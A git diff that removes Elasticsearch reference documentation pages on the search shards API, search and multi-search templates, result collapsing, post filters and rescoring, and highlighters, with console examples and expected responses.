- - -[[search-shards-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - - -[[search-shards-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ --- -Defaults to `open`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - - -[[search-shards-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search_shards --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":5}}\n/] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes": ..., - "indices" : { - "my-index-000001": { } - }, - "shards": [ - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 0, - "state": "STARTED", - "allocation_id": {"id":"0TvkCyF7TAmM1wHP4a42-A"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 1, - "state": "STARTED", - "allocation_id": {"id":"fMju3hd1QHWmWrIgFnI4Ww"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 2, - "state": "STARTED", - "allocation_id": {"id":"Nwl0wbMBTHCWjEEbGYGapg"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 3, - "state": "STARTED", - "allocation_id": {"id":"bU_KLGJISbW0RejwnwDPKw"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 4, - "state": "STARTED", - "allocation_id": {"id":"DMs7_giNSwmdqVukF7UydA"}, - "relocating_node": null - } - ] - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"nodes": ...,/"nodes": $body.nodes,/] -// TESTRESPONSE[s/JklnKbD7Tyqi9TP3_Q_tBg/$body.shards.0.0.node/] -// TESTRESPONSE[s/0TvkCyF7TAmM1wHP4a42-A/$body.shards.0.0.allocation_id.id/] -// TESTRESPONSE[s/fMju3hd1QHWmWrIgFnI4Ww/$body.shards.1.0.allocation_id.id/] -// TESTRESPONSE[s/Nwl0wbMBTHCWjEEbGYGapg/$body.shards.2.0.allocation_id.id/] -// TESTRESPONSE[s/bU_KLGJISbW0RejwnwDPKw/$body.shards.3.0.allocation_id.id/] -// TESTRESPONSE[s/DMs7_giNSwmdqVukF7UydA/$body.shards.4.0.allocation_id.id/] - -Specifying the same request, this time with a routing value: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search_shards?routing=foo,bar --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":5}}\n/] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes": ..., - "indices" : { - "my-index-000001": { } - }, - "shards": [ - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 2, - "state": "STARTED", - "allocation_id": 
{"id":"fMju3hd1QHWmWrIgFnI4Ww"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 3, - "state": "STARTED", - "allocation_id": {"id":"0TvkCyF7TAmM1wHP4a42-A"}, - "relocating_node": null - } - ] - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"nodes": ...,/"nodes": $body.nodes,/] -// TESTRESPONSE[s/JklnKbD7Tyqi9TP3_Q_tBg/$body.shards.1.0.node/] -// TESTRESPONSE[s/0TvkCyF7TAmM1wHP4a42-A/$body.shards.1.0.allocation_id.id/] -// TESTRESPONSE[s/fMju3hd1QHWmWrIgFnI4Ww/$body.shards.0.0.allocation_id.id/] - -Because of the specified routing values, -the search is only executed against two of the shards. diff --git a/docs/reference/search/search-template.asciidoc b/docs/reference/search/search-template.asciidoc deleted file mode 100644 index cf0c78bf549..00000000000 --- a/docs/reference/search/search-template.asciidoc +++ /dev/null @@ -1,706 +0,0 @@ -[[search-template]] -=== Search Template - -Allows you to use the mustache language to pre render search requests. - -[source,console] ------------------------------------------- -GET _search/template -{ - "source" : { - "query": { "match" : { "{{my_field}}" : "{{my_value}}" } }, - "size" : "{{my_size}}" - }, - "params" : { - "my_field" : "message", - "my_value" : "foo", - "my_size" : 5 - } -} ------------------------------------------- -// TEST[setup:my_index] - -[[search-template-api-request]] -==== {api-request-title} - -`GET _search/template` - - -[[search-template-api-desc]] -==== {api-description-title} - -The `/_search/template` endpoint allows you to use the mustache language to pre- -render search requests, before they are executed and fill existing templates -with template parameters. - -For more information on how Mustache templating and what kind of templating you -can do with it check out the https://mustache.github.io/mustache.5.html[online -documentation of the mustache project]. - -NOTE: The mustache language is implemented in {es} as a sandboxed scripting -language, hence it obeys settings that may be used to enable or disable scripts -per type and context as described in the -<>. - - -[[search-template-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - - -[[search-template-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -`ccs_minimize_roundtrips`:: - (Optional, Boolean) If `true`, network round-trips are minimized for - cross-cluster search requests. Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -`explain`:: - (Optional, Boolean) If `true`, the response includes additional details about - score computation as part of a hit. Defaults to `false`. - -`ignore_throttled`:: - (Optional, Boolean) If `true`, specified concrete, expanded or aliased indices - are not included in the response when throttled. Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -`profile`:: - (Optional, Boolean) If `true`, the query execution is profiled. Defaults - to `false`. - -`rest_total_hits_as_int`:: - (Optional, Boolean) If `true`, `hits.total` are rendered as an integer in - the response. Defaults to `false`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search_type] - -`typed_keys`:: - (Optional, Boolean) If `true`, aggregation and suggester names are - prefixed by their respective types in the response. Defaults to `false`. - - -[[search-template-api-request-body]] -==== {api-request-body-title} - -The API request body must contain the search definition template and its parameters. - - -[[search-template-api-example]] -==== {api-response-codes-title} - - -[[pre-registered-templates]] -===== Store a search template - -You can store a search template using the stored scripts API. - -[source,console] ------------------------------------------- -POST _scripts/ -{ - "script": { - "lang": "mustache", - "source": { - "query": { - "match": { - "title": "{{query_string}}" - } - } - } - } -} ------------------------------------------- -// TEST[continued] - -////////////////////////// - -The API returns the following result if the template has been successfully -created: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- - -////////////////////////// - - -The template can be retrieved by calling - -[source,console] ------------------------------------------- -GET _scripts/ ------------------------------------------- -// TEST[continued] - -The API returns the following result: - -[source,console-result] ------------------------------------------- -{ - "script" : { - "lang" : "mustache", - "source" : """{"query":{"match":{"title":"{{query_string}}"}}}""", - "options": { - "content_type" : "application/json; charset=UTF-8" - } - }, - "_id": "", - "found": true -} ------------------------------------------- - - -This template can be deleted by calling - -[source,console] ------------------------------------------- -DELETE _scripts/ ------------------------------------------- -// TEST[continued] - - -[[use-registered-templates]] -===== Using a stored search template - -To use a stored template at search time send the following request: - -[source,console] ------------------------------------------- -GET _search/template -{ - "id": "", <1> - "params": { - "query_string": "search for these words" - } -} ------------------------------------------- -// TEST[catch:missing] -<1> Name of the stored template script. - - -[[_validating_templates]] -==== Validating a search template - -A template can be rendered in a response with given parameters by using the -following request: - -[source,console] ------------------------------------------- -GET _render/template -{ - "source": "{ \"query\": { \"terms\": {{#toJson}}statuses{{/toJson}} }}", - "params": { - "statuses" : { - "status": [ "pending", "published" ] - } - } -} ------------------------------------------- - - -The API returns the rendered template: - -[source,console-result] ------------------------------------------- -{ - "template_output": { - "query": { - "terms": { - "status": [ <1> - "pending", - "published" - ] - } - } - } -} ------------------------------------------- - -<1> `status` array has been populated with values from the `params` object. - - -Stored templates can also be rendered by calling the following request: - -[source,js] ------------------------------------------- -GET _render/template/ -{ - "params": { - "..." 
- } -} ------------------------------------------- -// NOTCONSOLE - -[[search-template-explain-parameter]] -===== Using the explain parameter - -You can use the `explain` parameter when running a template: - -[source,console] ------------------------------------------- -GET _search/template -{ - "id": "my_template", - "params": { - "status": [ "pending", "published" ] - }, - "explain": true -} ------------------------------------------- -// TEST[catch:missing] - - -[[search-template-profile-parameter]] -===== Profiling - -You can use the `profile` parameter when running a template: - -[source,console] ------------------------------------------- -GET _search/template -{ - "id": "my_template", - "params": { - "status": [ "pending", "published" ] - }, - "profile": true -} ------------------------------------------- -// TEST[catch:missing] - - -[[search-template-query-string-single]] -===== Filling in a query string with a single value - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": { - "query": { - "term": { - "message": "{{query_string}}" - } - } - }, - "params": { - "query_string": "search for these words" - } -} ------------------------------------------- -// TEST[setup:my_index] - -[[search-template-converting-to-json]] -===== Converting parameters to JSON - -The `{{#toJson}}parameter{{/toJson}}` function can be used to convert parameters -like maps and array to their JSON representation: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": "{ \"query\": { \"terms\": {{#toJson}}statuses{{/toJson}} }}", - "params": { - "statuses" : { - "status": [ "pending", "published" ] - } - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query": { - "terms": { - "status": [ - "pending", - "published" - ] - } - } -} ------------------------------------------- -// NOTCONSOLE - -A more complex example substitutes an array of JSON objects: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": "{\"query\":{\"bool\":{\"must\": {{#toJson}}clauses{{/toJson}} }}}", - "params": { - "clauses": [ - { "term": { "user" : "foo" } }, - { "term": { "user" : "bar" } } - ] - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query": { - "bool": { - "must": [ - { - "term": { - "user": "foo" - } - }, - { - "term": { - "user": "bar" - } - } - ] - } - } -} ------------------------------------------- -// NOTCONSOLE - -[[search-template-concatenate-array]] -===== Concatenating array of values - -The `{{#join}}array{{/join}}` function can be used to concatenate the -values of an array as a comma delimited string: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": { - "query": { - "match": { - "emails": "{{#join}}emails{{/join}}" - } - } - }, - "params": { - "emails": [ "username@email.com", "lastname@email.com" ] - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query" : { - "match" : { - "emails" : "username@email.com,lastname@email.com" - } - } -} ------------------------------------------- -// NOTCONSOLE - -The function also accepts a custom delimiter: - -[source,console] ------------------------------------------- -GET _search/template -{ - "source": { - "query": { 
- "range": { - "born": { - "gte" : "{{date.min}}", - "lte" : "{{date.max}}", - "format": "{{#join delimiter='||'}}date.formats{{/join delimiter='||'}}" - } - } - } - }, - "params": { - "date": { - "min": "2016", - "max": "31/12/2017", - "formats": ["dd/MM/yyyy", "yyyy"] - } - } -} ------------------------------------------- - -which is rendered as: - -[source,js] ------------------------------------------- -{ - "query": { - "range": { - "born": { - "gte": "2016", - "lte": "31/12/2017", - "format": "dd/MM/yyyy||yyyy" - } - } - } -} - ------------------------------------------- -// NOTCONSOLE - -[[search-template-default-values]] -===== Default values - -A default value is written as `{{var}}{{^var}}default{{/var}}` for instance: - -[source,js] ------------------------------------------- -{ - "source": { - "query": { - "range": { - "line_no": { - "gte": "{{start}}", - "lte": "{{end}}{{^end}}20{{/end}}" - } - } - } - }, - "params": { ... } -} ------------------------------------------- -// NOTCONSOLE - -When `params` is `{ "start": 10, "end": 15 }` this query would be rendered as: - -[source,js] ------------------------------------------- -{ - "range": { - "line_no": { - "gte": "10", - "lte": "15" - } - } -} ------------------------------------------- -// NOTCONSOLE - -But when `params` is `{ "start": 10 }` this query would use the default value -for `end`: - -[source,js] ------------------------------------------- -{ - "range": { - "line_no": { - "gte": "10", - "lte": "20" - } - } -} ------------------------------------------- -// NOTCONSOLE - -[[search-template-conditional-clauses]] -===== Conditional clauses - -Conditional clauses cannot be expressed using the JSON form of the template. -Instead, the template *must* be passed as a string. For instance, let's say -we wanted to run a `match` query on the `line` field, and optionally wanted -to filter by line numbers, where `start` and `end` are optional. - -The `params` would look like: - -[source,js] ------------------------------------------- -{ - "params": { - "text": "words to search for", - "line_no": { <1> - "start": 10, - "end": 20 - } - } -} ------------------------------------------- -// NOTCONSOLE -<1> The `line_no`, `start`, and `end` parameters are optional. 
- -When written as a query, the template would include invalid JSON, such as -section markers like `{{#line_no}}`: - -[source,js] ------------------------------------------- -{ - "query": { - "bool": { - "must": { - "match": { - "line": "{{text}}" <1> - } - }, - "filter": { - {{#line_no}} <2> - "range": { - "line_no": { - {{#start}} <3> - "gte": "{{start}}" <4> - {{#end}},{{/end}} <5> - {{/start}} - {{#end}} <6> - "lte": "{{end}}" <7> - {{/end}} - } - } - {{/line_no}} - } - } - } -} ------------------------------------------- -// NOTCONSOLE -<1> Fill in the value of param `text` -<2> Include the `range` filter only if `line_no` is specified -<3> Include the `gte` clause only if `line_no.start` is specified -<4> Fill in the value of param `line_no.start` -<5> Add a comma after the `gte` clause only if `line_no.start` - AND `line_no.end` are specified -<6> Include the `lte` clause only if `line_no.end` is specified -<7> Fill in the value of param `line_no.end` - -Because search templates cannot include invalid JSON, you can pass the same -query as a string instead: - -[source,js] --------------------- -"source": "{\"query\":{\"bool\":{\"must\":{\"match\":{\"line\":\"{{text}}\"}},\"filter\":{{{#line_no}}\"range\":{\"line_no\":{{{#start}}\"gte\":\"{{start}}\"{{#end}},{{/end}}{{/start}}{{#end}}\"lte\":\"{{end}}\"{{/end}}}}{{/line_no}}}}}}" --------------------- -// NOTCONSOLE - - -[[search-template-encode-urls]] -===== Encoding URLs - -The `{{#url}}value{{/url}}` function can be used to encode a string value -in a HTML encoding form as defined in by the -https://www.w3.org/TR/html4/[HTML specification]. - -As an example, it is useful to encode a URL: - -[source,console] ------------------------------------------- -GET _render/template -{ - "source": { - "query": { - "term": { - "http_access_log": "{{#url}}{{host}}/{{page}}{{/url}}" - } - } - }, - "params": { - "host": "https://www.elastic.co/", - "page": "learn" - } -} ------------------------------------------- - - -The previous query will be rendered as: - -[source,console-result] ------------------------------------------- -{ - "template_output": { - "query": { - "term": { - "http_access_log": "https%3A%2F%2Fwww.elastic.co%2F%2Flearn" - } - } - } -} ------------------------------------------- - - -[[multi-search-template]] -=== Multi Search Template - -Allows to execute several search template requests. - -[[multi-search-template-api-request]] -==== {api-request-title} - -`GET _msearch/template` - - -[[multi-search-template-api-desc]] -==== {api-description-title} - -Allows to execute several search template requests within the same API using the -`_msearch/template` endpoint. - -The format of the request is similar to the <> format: - -[source,js] --------------------------------------------------- -header\n -body\n -header\n -body\n --------------------------------------------------- -// NOTCONSOLE - -The header part supports the same `index`, `search_type`, `preference`, and -`routing` options as the Multi Search API. - -The body includes a search template body request and supports inline, stored and -file templates. 
- - -[[multi-search-template-api-example]] -==== {api-examples-title} - -[source,js] --------------------------------------------------- -$ cat requests -{"index": "test"} -{"source": {"query": {"match": {"user" : "{{username}}" }}}, "params": {"username": "john"}} <1> -{"source": {"query": {"{{query_type}}": {"name": "{{name}}" }}}, "params": {"query_type": "match_phrase_prefix", "name": "Smith"}} -{"index": "_all"} -{"id": "template_1", "params": {"query_string": "search for these words" }} <2> - -$ curl -H "Content-Type: application/x-ndjson" -XGET localhost:9200/_msearch/template --data-binary "@requests"; echo --------------------------------------------------- -// NOTCONSOLE -// Not converting to console because this shows how curl works -<1> Inline search template request - -<2> Search template request based on a stored template - -The response returns a `responses` array, which includes the search template -response for each search template request matching its order in the original -multi search template request. If there was a complete failure for that specific -search template request, an object with `error` message will be returned in -place of the actual search response. diff --git a/docs/reference/search/search-your-data/collapse-search-results.asciidoc b/docs/reference/search/search-your-data/collapse-search-results.asciidoc deleted file mode 100644 index e4f8c8b100e..00000000000 --- a/docs/reference/search/search-your-data/collapse-search-results.asciidoc +++ /dev/null @@ -1,226 +0,0 @@ -[[collapse-search-results]] -== Collapse search results - -You can use the `collapse` parameter to collapse search results based -on field values. The collapsing is done by selecting only the top sorted -document per collapse key. - -For example, the following search collapses results by `user.id` and sorts them -by `http.response.bytes`. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "user.id" <1> - }, - "sort": [ "http.response.bytes" ], <2> - "from": 10 <3> -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> Collapse the result set using the "user.id" field -<2> Sort the results by `http.response.bytes` -<3> define the offset of the first collapsed result - -WARNING: The total number of hits in the response indicates the number of matching documents without collapsing. -The total number of distinct group is unknown. - -The field used for collapsing must be a single valued <> or <> field with <> activated - -NOTE: The collapsing is applied to the top hits only and does not affect aggregations. - -[discrete] -[[expand-collapse-results]] -=== Expand collapse results - -It is also possible to expand each collapsed top hits with the `inner_hits` option. 
- -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "user.id", <1> - "inner_hits": { - "name": "most_recent", <2> - "size": 5, <3> - "sort": [ { "@timestamp": "asc" } ] <4> - }, - "max_concurrent_group_searches": 4 <5> - }, - "sort": [ "http.response.bytes" ] -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> collapse the result set using the "user.id" field -<2> the name used for the inner hit section in the response -<3> the number of inner_hits to retrieve per collapse key -<4> how to sort the document inside each group -<5> the number of concurrent requests allowed to retrieve the `inner_hits` per group - -See <> for the complete list of supported options and the format of the response. - -It is also possible to request multiple `inner_hits` for each collapsed hit. This can be useful when you want to get -multiple representations of the collapsed hits. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "user.id", <1> - "inner_hits": [ - { - "name": "largest_responses", <2> - "size": 3, - "sort": [ "http.response.bytes" ] - }, - { - "name": "most_recent", <3> - "size": 3, - "sort": [ { "@timestamp": "asc" } ] - } - ] - }, - "sort": [ "http.response.bytes" ] -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> collapse the result set using the "user.id" field -<2> return the three largest HTTP responses for the user -<3> return the three most recent HTTP responses for the user - -The expansion of the group is done by sending an additional query for each -`inner_hit` request for each collapsed hit returned in the response. This can significantly slow things down -if you have too many groups and/or `inner_hit` requests. - -The `max_concurrent_group_searches` request parameter can be used to control -the maximum number of concurrent searches allowed in this phase. -The default is based on the number of data nodes and the default search thread pool size. - -WARNING: `collapse` cannot be used in conjunction with <>, -<> or <>. - -[discrete] -[[second-level-of-collapsing]] -=== Second level of collapsing - -Second level of collapsing is also supported and is applied to `inner_hits`. - -For example, the following search collapses results by `geo.country_name`. -Within each `geo.country_name`, inner hits are collapsed by `user.id`. - -[source,js] --------------------------------------------------- -GET /my-index-000001/_search -{ - "query": { - "match": { - "message": "GET /search" - } - }, - "collapse": { - "field": "geo.country_name", - "inner_hits": { - "name": "by_location", - "collapse": { "field": "user.id" }, - "size": 3 - } - } -} --------------------------------------------------- -// NOTCONSOLE - - -Response: -[source,js] --------------------------------------------------- -{ - ... - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "9", - "_score": ..., - "_source": {...}, - "fields": { "geo": { "country_name": [ "UK" ] }}, - "inner_hits": { - "by_location": { - "hits": { - ..., - "hits": [ - { - ... - "fields": { "user": "id": { [ "user124" ] }} - }, - { - ... - "fields": { "user": "id": { [ "user589" ] }} - }, - { - ... 
- "fields": { "user": "id": { [ "user001" ] }} - } - ] - } - } - } - }, - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": .., - "_source": {... - }, - "fields": { "geo": { "country_name": [ "Canada" ] }}, - "inner_hits": { - "by_location": { - "hits": { - ..., - "hits": [ - { - ... - "fields": { "user": "id": { [ "user444" ] }} - }, - { - ... - "fields": { "user": "id": { [ "user1111" ] } - }, - { - ... - "fields": { "user": "id": { [ "user999" ] }} - } - ] - } - } - } - }, - ... - ] -} --------------------------------------------------- -// NOTCONSOLE - -NOTE: Second level of collapsing doesn't allow `inner_hits`. \ No newline at end of file diff --git a/docs/reference/search/search-your-data/filter-search-results.asciidoc b/docs/reference/search/search-your-data/filter-search-results.asciidoc deleted file mode 100644 index 2704f1d1141..00000000000 --- a/docs/reference/search/search-your-data/filter-search-results.asciidoc +++ /dev/null @@ -1,291 +0,0 @@ -[[filter-search-results]] -== Filter search results - -You can use two methods to filter search results: - -* Use a boolean query with a `filter` clause. Search requests apply -<> to both search hits and -<>. - -* Use the search API's `post_filter` parameter. Search requests apply -<> only to search hits, not aggregations. You can use -a post filter to calculate aggregations based on a broader result set, and then -further narrow the results. -+ -You can also <> hits after the post filter to -improve relevance and reorder results. - -[discrete] -[[post-filter]] -=== Post filter - -When you use the `post_filter` parameter to filter search results, the search -hits are filtered after the aggregations are calculated. A post filter has no -impact on the aggregation results. - -For example, you are selling shirts that have the following properties: - -[source,console] --------------------------------------------------- -PUT /shirts -{ - "mappings": { - "properties": { - "brand": { "type": "keyword"}, - "color": { "type": "keyword"}, - "model": { "type": "keyword"} - } - } -} - -PUT /shirts/_doc/1?refresh -{ - "brand": "gucci", - "color": "red", - "model": "slim" -} --------------------------------------------------- -// TESTSETUP - - -Imagine a user has specified two filters: - -`color:red` and `brand:gucci`. You only want to show them red shirts made by -Gucci in the search results. Normally you would do this with a -<>: - -[source,console] --------------------------------------------------- -GET /shirts/_search -{ - "query": { - "bool": { - "filter": [ - { "term": { "color": "red" }}, - { "term": { "brand": "gucci" }} - ] - } - } -} --------------------------------------------------- - -However, you would also like to use _faceted navigation_ to display a list of -other options that the user could click on. Perhaps you have a `model` field -that would allow the user to limit their search results to red Gucci -`t-shirts` or `dress-shirts`. - -This can be done with a -<>: - -[source,console] --------------------------------------------------- -GET /shirts/_search -{ - "query": { - "bool": { - "filter": [ - { "term": { "color": "red" }}, - { "term": { "brand": "gucci" }} - ] - } - }, - "aggs": { - "models": { - "terms": { "field": "model" } <1> - } - } -} --------------------------------------------------- - -<1> Returns the most popular models of red shirts by Gucci. - -But perhaps you would also like to tell the user how many Gucci shirts are -available in *other colors*. 
If you just add a `terms` aggregation on the -`color` field, you will only get back the color `red`, because your query -returns only red shirts by Gucci. - -Instead, you want to include shirts of all colors during aggregation, then -apply the `colors` filter only to the search results. This is the purpose of -the `post_filter`: - -[source,console] --------------------------------------------------- -GET /shirts/_search -{ - "query": { - "bool": { - "filter": { - "term": { "brand": "gucci" } <1> - } - } - }, - "aggs": { - "colors": { - "terms": { "field": "color" } <2> - }, - "color_red": { - "filter": { - "term": { "color": "red" } <3> - }, - "aggs": { - "models": { - "terms": { "field": "model" } <3> - } - } - } - }, - "post_filter": { <4> - "term": { "color": "red" } - } -} --------------------------------------------------- - -<1> The main query now finds all shirts by Gucci, regardless of color. -<2> The `colors` agg returns popular colors for shirts by Gucci. -<3> The `color_red` agg limits the `models` sub-aggregation - to *red* Gucci shirts. -<4> Finally, the `post_filter` removes colors other than red - from the search `hits`. - -[discrete] -[[rescore]] -=== Rescore filtered search results - -Rescoring can help to improve precision by reordering just the top (eg -100 - 500) documents returned by the -<> and -<> phases, using a -secondary (usually more costly) algorithm, instead of applying the -costly algorithm to all documents in the index. - -A `rescore` request is executed on each shard before it returns its -results to be sorted by the node handling the overall search request. - -Currently the rescore API has only one implementation: the query -rescorer, which uses a query to tweak the scoring. In the future, -alternative rescorers may be made available, for example, a pair-wise rescorer. - -NOTE: An error will be thrown if an explicit <> -(other than `_score` in descending order) is provided with a `rescore` query. - -NOTE: when exposing pagination to your users, you should not change -`window_size` as you step through each page (by passing different -`from` values) since that can alter the top hits causing results to -confusingly shift as the user steps through pages. - -[discrete] -[[query-rescorer]] -==== Query rescorer - -The query rescorer executes a second query only on the Top-K results -returned by the <> and -<> phases. The -number of docs which will be examined on each shard can be controlled by -the `window_size` parameter, which defaults to 10. - -By default the scores from the original query and the rescore query are -combined linearly to produce the final `_score` for each document. The -relative importance of the original query and of the rescore query can -be controlled with the `query_weight` and `rescore_query_weight` -respectively. Both default to `1`. 
- -For example: - -[source,console] --------------------------------------------------- -POST /_search -{ - "query" : { - "match" : { - "message" : { - "operator" : "or", - "query" : "the quick brown" - } - } - }, - "rescore" : { - "window_size" : 50, - "query" : { - "rescore_query" : { - "match_phrase" : { - "message" : { - "query" : "the quick brown", - "slop" : 2 - } - } - }, - "query_weight" : 0.7, - "rescore_query_weight" : 1.2 - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The way the scores are combined can be controlled with the `score_mode`: -[cols="<,<",options="header",] -|======================================================================= -|Score Mode |Description -|`total` |Add the original score and the rescore query score. The default. -|`multiply` |Multiply the original score by the rescore query score. Useful -for <> rescores. -|`avg` |Average the original score and the rescore query score. -|`max` |Take the max of original score and the rescore query score. -|`min` |Take the min of the original score and the rescore query score. -|======================================================================= - -[discrete] -[[multiple-rescores]] -==== Multiple rescores - -It is also possible to execute multiple rescores in sequence: - -[source,console] --------------------------------------------------- -POST /_search -{ - "query" : { - "match" : { - "message" : { - "operator" : "or", - "query" : "the quick brown" - } - } - }, - "rescore" : [ { - "window_size" : 100, - "query" : { - "rescore_query" : { - "match_phrase" : { - "message" : { - "query" : "the quick brown", - "slop" : 2 - } - } - }, - "query_weight" : 0.7, - "rescore_query_weight" : 1.2 - } - }, { - "window_size" : 10, - "query" : { - "score_mode": "multiply", - "rescore_query" : { - "function_score" : { - "script_score": { - "script": { - "source": "Math.log10(doc.count.value + 2)" - } - } - } - } - } - } ] -} --------------------------------------------------- -// TEST[setup:my_index] - -The first one gets the results of the query then the second one gets the -results of the first, etc. The second rescore will "see" the sorting done -by the first rescore so it is possible to use a large window on the first -rescore to pull documents into a smaller window for the second rescore. diff --git a/docs/reference/search/search-your-data/highlighting.asciidoc b/docs/reference/search/search-your-data/highlighting.asciidoc deleted file mode 100644 index 97e471ea474..00000000000 --- a/docs/reference/search/search-your-data/highlighting.asciidoc +++ /dev/null @@ -1,1124 +0,0 @@ -[[highlighting]] -== Highlighting - -Highlighters enable you to get highlighted snippets from one or more fields -in your search results so you can show users where the query matches are. -When you request highlights, the response contains an additional `highlight` -element for each search hit that includes the highlighted fields and the -highlighted fragments. - -NOTE: Highlighters don't reflect the boolean logic of a query when extracting - terms to highlight. Thus, for some complex boolean queries (e.g nested boolean - queries, queries using `minimum_should_match` etc.), parts of documents may be - highlighted that don't correspond to query matches. - -Highlighting requires the actual content of a field. If the field is not -stored (the mapping does not set `store` to `true`), the actual `_source` is -loaded and the relevant field is extracted from `_source`. 
- -For example, to get highlights for the `content` field in each search hit -using the default highlighter, include a `highlight` object in -the request body that specifies the `content` field: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { "content": "kimchy" } - }, - "highlight": { - "fields": { - "content": {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -{es} supports three highlighters: `unified`, `plain`, and `fvh` (fast vector -highlighter). You can specify the highlighter `type` you want to use -for each field. - -[discrete] -[[unified-highlighter]] -=== Unified highlighter -The `unified` highlighter uses the Lucene Unified Highlighter. This -highlighter breaks the text into sentences and uses the BM25 algorithm to score -individual sentences as if they were documents in the corpus. It also supports -accurate phrase and multi-term (fuzzy, prefix, regex) highlighting. This is the -default highlighter. - -[discrete] -[[plain-highlighter]] -=== Plain highlighter -The `plain` highlighter uses the standard Lucene highlighter. It attempts to -reflect the query matching logic in terms of understanding word importance and -any word positioning criteria in phrase queries. - -[WARNING] -The `plain` highlighter works best for highlighting simple query matches in a -single field. To accurately reflect query logic, it creates a tiny in-memory -index and re-runs the original query criteria through Lucene's query execution -planner to get access to low-level match information for the current document. -This is repeated for every field and every document that needs to be highlighted. -If you want to highlight a lot of fields in a lot of documents with complex -queries, we recommend using the `unified` highlighter on `postings` or `term_vector` fields. - -[discrete] -[[fast-vector-highlighter]] -=== Fast vector highlighter -The `fvh` highlighter uses the Lucene Fast Vector highlighter. -This highlighter can be used on fields with `term_vector` set to -`with_positions_offsets` in the mapping. The fast vector highlighter: - -* Can be customized with a <>. -* Requires setting `term_vector` to `with_positions_offsets` which - increases the size of the index -* Can combine matches from multiple fields into one result. See - `matched_fields` -* Can assign different weights to matches at different positions allowing - for things like phrase matches being sorted above term matches when - highlighting a Boosting Query that boosts phrase matches over term matches - -[WARNING] -The `fvh` highlighter does not support span queries. If you need support for -span queries, try an alternative highlighter, such as the `unified` highlighter. - -[discrete] -[[offsets-strategy]] -=== Offsets strategy -To create meaningful search snippets from the terms being queried, -the highlighter needs to know the start and end character offsets of each word -in the original text. These offsets can be obtained from: - -* The postings list. If `index_options` is set to `offsets` in the mapping, -the `unified` highlighter uses this information to highlight documents without -re-analyzing the text. It re-runs the original query directly on the postings -and extracts the matching offsets from the index, limiting the collection to -the highlighted documents. This is important if you have large fields because -it doesn't require reanalyzing the text to be highlighted. 
